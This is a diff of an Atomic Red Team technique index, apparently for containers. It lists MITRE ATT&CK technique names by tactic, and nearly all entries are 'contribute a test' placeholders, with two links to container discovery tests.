+- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1653 Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.002 Office Application Startup: Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# command-and-control
+- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1132.001 Data Encoding: Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090.003 Proxy: Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1571 Non-Standard Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.003 Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.001 Application Layer Protocol: Web Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1105 Ingress Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.002 Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1090.001 Proxy: Internal Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# collection
+- T1560.001 Archive Collected Data: Archive via Utility [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1113 Screen Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.001 Input Capture: Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1123 Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1074.001 Data Staged: Local Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.001 Email Collection: Local Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1115 Clipboard Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1560.002 Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1185 Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1125 Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.002 Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.002 Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.004 Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # lateral-movement
+- T1021.005 Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.002 Remote Services: SMB/Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.006 Remote Services: Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.003 Remote Services: Distributed Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.003 Use Alternate Authentication Material: Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1563.002 Remote Service Session Hijacking: RDP Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.002 Use Alternate Authentication Material: Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.001 Remote Services: Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# credential-access
+- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.001 Input Capture: Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.002 OS Credential Dumping: Security Account Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.004 OS Credential Dumping: LSA Secrets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1040 Network Sniffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552.002 Unsecured Credentials: Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1555.003 Credentials from Password Stores: Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552.004 Unsecured Credentials: Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.001 OS Credential Dumping: LSASS Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.005 OS Credential Dumping: Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552.001 Unsecured Credentials: Credentials In Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552.006 Unsecured Credentials: Group Policy Preferences [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.002 Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1187 Forced Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.006 OS Credential Dumping: DCSync [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.004 Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# discovery
+- T1033 System Owner/User Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1016.001 System Network Configuration Discovery: Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1615 Group Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087.001 Account Discovery: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.001 Virtualization/Sandbox Evasion: System Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1007 System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1040 Network Sniffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1135 Network Share Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1082 System Information Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1016.002 System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1217 Browser Bookmark Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1016 System Network Configuration Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1482 Domain Trust Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1083 File and Directory Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1049 System Network Connections Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1654 Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1057 Process Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
+  - Atomic Test #7: Permission Groups Discovery for Containers- Local Groups [containers]
+- T1201 Password Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1614.001 System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1012 Query Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1018 Remote System Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1046 Network Service Discovery](../../T1046/T1046.md)
+  - Atomic Test #9: Network Service Discovery for Containers [containers]
+- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1124 System Time Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # impact
+- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1489 Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.002 Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1491.001 Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.001 Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1531 Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1496 Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1485 Data Destruction [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1529 System Shutdown/Reboot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# initial-access
+- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566.002 Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566.001 Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
